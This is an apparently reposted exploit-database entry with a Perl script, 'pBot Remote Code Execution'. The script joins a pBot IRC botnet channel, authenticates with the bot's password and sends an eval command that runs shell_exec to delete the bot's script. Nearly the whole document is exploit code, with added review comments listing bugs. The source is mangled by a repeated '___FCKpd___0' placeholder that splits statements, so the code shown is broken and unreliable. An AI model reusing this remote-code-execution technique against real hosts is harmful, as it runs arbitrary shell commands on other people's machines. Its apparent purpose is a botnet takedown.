pBot Remote Code Execution
来源:@bwallHatesTwits 作者:bwall 发布时间:2012-08-01  
#!/usr/bin/perl
# Exploit Title: pBot Remote Code Execution ("*" hostauth)
# Date: 31.07.2012
# Exploit Author: @bwallHatesTwits
# Software Link: https://www.firebwall.com/decoding/read.php?u=620d21fd31b87046e94975e03fdafa8a (decoded from attempted attack)
# Version: Various versions
# Tested on: Linux 3.2

use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;

# Identity this client presents to the IRC server (NICK and USER fields).
my ($nickname, $ident, $fullname) = ('BotSlayer') x 3;

# Selector the main loop polls for readable IRC sockets.
our $sel_client = IO::Select->new;

# Connection details and command settings taken from the decoded bot source.
# The trailing comment on each line names the matching key in the bot's config.
our $ircserver     = 'localhost';   # "server"
our $ircserverpass = '';            # "pass"
my  $ircport       = '6667';        # "port"
# If the bot's "key" is set, append a space and that key to the channel name.
my  @channels      = ('#anonbxu');  # "chan" and "chan2"
our $botPass       = 'hello';       # "password"
our $botTrigger    = '.';           # "trigger"
# The bot's hostauth must be "*" (commands accepted from any hostmask).
our $loginCMD      = 'user';        # usually "user" or "login"

# Payload: the PHP code the bot is asked to eval.
# This version makes the bot delete its own originating script and exit.
#
# NOTE(review): everything from here to the end of the script has been mangled by the
# hosting site. The source was collapsed onto a handful of lines and one recurring
# token was replaced by the editor placeholder "___FCKpd___0" (each occurrence sits on
# its own line, splitting the surrounding statement). The code is therefore not
# runnable as shown and is left byte-for-byte as published; the notes below only
# describe what is visible.
#
# Layout of the collapsed code:
#   $phpEval      - PHP handed to the bot's "eval" command: shell_exec("rm -f " .
#                   <script path>) followed by exit(), i.e. the bot removes its own
#                   file and terminates.
#   $channelCount - number of configured channels; counted down by tryQuit().
#   onJoin($chan) - drops the first character of the JOIN argument (presumably the
#                   leading ':' of "JOIN :#chan" - confirm against the server), then
#                   sends "<trigger><loginCMD> <botPass>", sleeps 1 s, sends
#                   "<trigger>eval @BallastSec <phpEval>", and calls tryQuit().
#   tryQuit()     - decrements $channelCount and calls quit() once it reaches 0.
#   sendraw(...)  - with two arguments prints to the given socket; with one prints to
#                   the global $IRC_cur_socket. A "\n" is appended either way.
#   conn($nick, $server, $port) - opens the TCP connection, adds it to $sel_client,
#                   records host/port/nick/local address in %irc_servers keyed by the
#                   socket, then sends PASS (see note 1), NICK and USER and sleeps 1 s.
#   parse($line)  - prints the line; answers PING with PONG; on JOIN calls onJoin();
#                   on CTCP VERSION replies with a NOTICE; follows NICK changes of our
#                   own nick; on the 001 welcome numeric records nick and server name
#                   and sends JOIN for every entry of @channels.
#   main loop     - calls conn() while %irc_servers is empty, then polls $sel_client
#                   and feeds each received line to parse().
#   say/notice/join/part/quit - thin wrappers around sendraw() for PRIVMSG, NOTICE,
#                   JOIN, PART and QUIT (quit() also calls exit).
#
# Review notes on the visible code (documented, not fixed):
#   1. conn(): `if($ircserverpass != "")` compares numerically; any non-numeric
#      password (including the empty default) numifies to 0, so PASS is never sent
#      unless the password happens to be a non-zero number.
#   2. conn() returns 1 on a failed connect and the main loop's
#      `while (!(keys(%irc_servers))) { conn(...) }` retries at once, and the outer
#      loop uses `can_read(0)` followed by `next`, so the process spins at full CPU
#      both while unconnected and while idle.
#   3. $line_temp is declared but only ever reset to '', so a fragment that arrives
#      without its trailing newline is parsed as a complete line instead of being
#      carried over to the next read.
#   4. `sub join` shadows the core builtin: a plain `join(...)` call still resolves
#      to the builtin, so that wrapper is unreachable. `sub say` is only callable
#      because the file does not enable `use feature 'say'`.
#   5. parse(): the `$natrix`/`$arg` captures in the PRIVMSG branch are never used.
#   6. There is no `use strict`/`use warnings`; $IRC_cur_socket, %irc_servers,
#      $mynick, $fh, $nread, $msg, @lines and $line are package globals shared between
#      the main loop and the subs.
$phpEval = "shell_exec(\"rm -f \".\
___FCKpd___0
SERVER['SCRIPT_NAME']);exit();"; $channelCount = scalar(@channels); sub onJoin { my $channel = shift; $channel = substr($channel, 1); print "Joined $channel\n"; say($channel, $botTrigger.$loginCMD." $botPass"); sleep(1); say($channel, $botTrigger."eval \@BallastSec ".$phpEval); print "Payload delivered\n"; tryQuit(); } sub tryQuit { $channelCount--; if($channelCount == 0) { quit("whomp wha"); } } sub sendraw { if ($#_ == '1') { my $socket =
___FCKpd___0
[0]; print $socket "
___FCKpd___0
[1]\n"; } else { print $IRC_cur_socket "
___FCKpd___0
[0]\n"; } } sub conn { my $mynick =
___FCKpd___0
[0]; my $ircserver_con =
___FCKpd___0
[1]; my $ircport_con =
___FCKpd___0
[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; if($ircserverpass != "") { sendraw("PASS ".$ircserverpass); } sendraw("NICK ".$mynick); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname"); sleep 1; } } sub parse { my $servarg = shift; print $servarg."\n"; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) JOIN (.+)/) { my $channel = $4; onJoin($channel); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; if ($args =~ /^\001VERSION\001$/) { notice("$pn", "\001VERSION BotSlayer by Ballast Security\001"); } if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) { my $natrix = $1; my $arg = $2; } } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick=$4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; foreach(@channels) { sendraw("JOIN
___FCKpd___0
"); } } } my $line_temp; while(1) { while (!(keys(%irc_servers))) { conn($nickname, $ircserver, $ircport); } delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $msg, 4096); if ($nread == 0) { $sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $msg); $msg =~ s/\r\n$//; for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line=$line_temp.$line if ($line_temp); $line_temp=''; $line =~ s/\r$//; parse("$line"); } } } sub say { return unless $#_ == 1; sendraw("PRIVMSG
___FCKpd___0
[0] :
___FCKpd___0
[1]"); } sub notice { return unless $#_ == 1; sendraw("NOTICE
___FCKpd___0
[0] :
___FCKpd___0
[1]"); } sub join { sendraw("JOIN
___FCKpd___0
[0]"); } sub part { sendraw("PART
___FCKpd___0
[0]"); } sub quit { sendraw("QUIT :
___FCKpd___0
[0]"); exit; }

 